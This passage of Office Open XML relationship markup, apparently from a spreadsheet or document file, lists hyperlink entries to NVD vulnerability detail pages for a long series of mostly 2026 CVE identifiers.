TargetMode="External" Id="rId1448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78302" TargetMode="External" Id="rId1449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79322" TargetMode="External" Id="rId1450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79697" TargetMode="External" Id="rId1451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79698" TargetMode="External" Id="rId1452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79721" TargetMode="External" Id="rId1453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId1454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80214" TargetMode="External" Id="rId1455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8044" TargetMode="External" Id="rId1456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81213" TargetMode="External" Id="rId1457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81789" TargetMode="External" Id="rId1458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81889" TargetMode="External" Id="rId1459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82304" TargetMode="External" Id="rId1460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82461" TargetMode="External" Id="rId1461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82475" TargetMode="External" Id="rId1462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82684" TargetMode="External" Id="rId1463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82712" TargetMode="External" Id="rId1464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84068" TargetMode="External" Id="rId1465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84194" TargetMode="External" Id="rId1466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84203" TargetMode="External" Id="rId1467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId1468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85217" TargetMode="External" Id="rId1469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85388" TargetMode="External" Id="rId1470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85546" TargetMode="External" Id="rId1471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86167" TargetMode="External" Id="rId1472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86185" TargetMode="External" Id="rId1473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86299" TargetMode="External" Id="rId1474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86437" TargetMode="External" Id="rId1475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86438" TargetMode="External" Id="rId1476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId1477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86510" TargetMode="External" Id="rId1478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId1479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86720" TargetMode="External" Id="rId1480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86722" TargetMode="External" Id="rId1481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86723" TargetMode="External" Id="rId1482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId1483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86762" TargetMode="External" Id="rId1484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86770" TargetMode="External" Id="rId1485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87633" TargetMode="External" Id="rId1486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87794" TargetMode="External" Id="rId1487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87931" TargetMode="External" Id="rId1488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88047" TargetMode="External" Id="rId1489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88048" TargetMode="External" Id="rId1490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88049" TargetMode="External" Id="rId1491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88051" TargetMode="External" Id="rId1492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88053" TargetMode="External" Id="rId1493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88056" TargetMode="External" Id="rId1494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88058" TargetMode="External" Id="rId1495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88060" TargetMode="External" Id="rId1496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88863" TargetMode="External" Id="rId1497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88865" TargetMode="External" Id="rId1498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88895" TargetMode="External" Id="rId1499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88937" TargetMode="External" Id="rId1500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11813" TargetMode="External" Id="rId1501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12858" TargetMode="External" Id="rId1502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16233" TargetMode="External" Id="rId1503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16234" TargetMode="External" Id="rId1504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17107" TargetMode="External" Id="rId1505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23929" TargetMode="External" Id="rId1506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45221" TargetMode="External" Id="rId1507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45414" TargetMode="External" Id="rId1508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4644" TargetMode="External" Id="rId1509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48113" TargetMode="External" Id="rId1510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54606" TargetMode="External" Id="rId1511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55108" TargetMode="External" Id="rId1512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55526" TargetMode="External" Id="rId1513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57485" TargetMode="External" Id="rId1514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId1515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61639" TargetMode="External" Id="rId1516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61640" TargetMode="External" Id="rId1517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62246" TargetMode="External" Id="rId1518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63425" TargetMode="External" Id="rId1519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63427" TargetMode="External" Id="rId1520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64195" TargetMode="External" Id="rId1521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64196" TargetMode="External" Id="rId1522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64197" TargetMode="External" Id="rId1523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64198" TargetMode="External" Id="rId1524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64200" TargetMode="External" Id="rId1525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64851" TargetMode="External" Id="rId1526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65986" TargetMode="External" Id="rId1527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId1528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId1529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67397" TargetMode="External" Id="rId1530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67609" TargetMode="External" Id="rId1531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId1532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68558" TargetMode="External" Id="rId1533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69250" TargetMode="External" Id="rId1534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6958" TargetMode="External" Id="rId1535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73072" TargetMode="External" Id="rId1536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73079" TargetMode="External" Id="rId1537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73233" TargetMode="External" Id="rId1538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73248" TargetMode="External" Id="rId1539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73410" TargetMode="External" Id="rId1540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId1541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75142" TargetMode="External" Id="rId1542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75486" TargetMode="External" Id="rId1543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75616" TargetMode="External" Id="rId1544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75858" TargetMode="External" Id="rId1545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75911" TargetMode="External" Id="rId1546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75913" TargetMode="External" Id="rId1547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75993" TargetMode="External" Id="rId1548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId1549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId1550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77974" TargetMode="External" Id="rId1551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80112" TargetMode="External" Id="rId1552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80114" TargetMode="External" Id="rId1553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80116" TargetMode="External" Id="rId1554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80119" TargetMode="External" Id="rId1555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80378" TargetMode="External" Id="rId1556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80436" TargetMode="External" Id="rId1557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81207" TargetMode="External" Id="rId1558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81302" TargetMode="External" Id="rId1559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81540" TargetMode="External" Id="rId1560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82474" TargetMode="External" Id="rId1561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84063" TargetMode="External" Id="rId1562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84226" TargetMode="External" Id="rId1563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85012" TargetMode="External" Id="rId1564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85384" TargetMode="External" Id="rId1565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85439" TargetMode="External" Id="rId1566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85656" TargetMode="External" Id="rId1567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85674" TargetMode="External" Id="rId1568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86095" TargetMode="External" Id="rId1569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86492" TargetMode="External" Id="rId1570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86540" TargetMode="External" Id="rId1571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86754" TargetMode="External" Id="rId1572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87023" TargetMode="External" Id="rId1573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87030" TargetMode="External" Id="rId1574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88886" TargetMode="External" Id="rId1575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88889" TargetMode="External" Id="rId1576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89049" TargetMode="External" Id="rId1577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9853" TargetMode="External" Id="rId1578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9854" TargetMode="External" Id="rId1579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-12737" TargetMode="External" Id="rId1580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0008" TargetMode="External" Id="rId1581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0010" TargetMode="External" Id="rId1582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18994" TargetMode="External" Id="rId1583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19136" TargetMode="External" Id="rId1584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19843" TargetMode="External" Id="rId1585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20501" TargetMode="External" Id="rId1586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20502" TargetMode="External" Id="rId1587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21085" TargetMode="External" Id="rId1588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21101" TargetMode="External" Id="rId1589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4130" TargetMode="External" Id="rId1590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42805" TargetMode="External" Id="rId1591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44901" TargetMode="External" Id="rId1592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47211" TargetMode="External" Id="rId1593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47764" TargetMode="External" Id="rId1594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47781" TargetMode="External" Id="rId1595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52491" TargetMode="External" Id="rId1596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52875" TargetMode="External" Id="rId1597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53091" TargetMode="External" Id="rId1598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54369" TargetMode="External" Id="rId1599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54371" TargetMode="External" Id="rId1600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55581" TargetMode="External" Id="rId1601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55582" TargetMode="External" Id="rId1602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57159" TargetMode="External" Id="rId1603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57432" TargetMode="External" Id="rId1604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63388" TargetMode="External" Id="rId1605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64657" TargetMode="External" Id="rId1606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66065" TargetMode="External" Id="rId1607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67986" TargetMode="External" Id="rId1608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId1609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId1610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72734" TargetMode="External" Id="rId1611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73076" TargetMode="External" Id="rId1612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 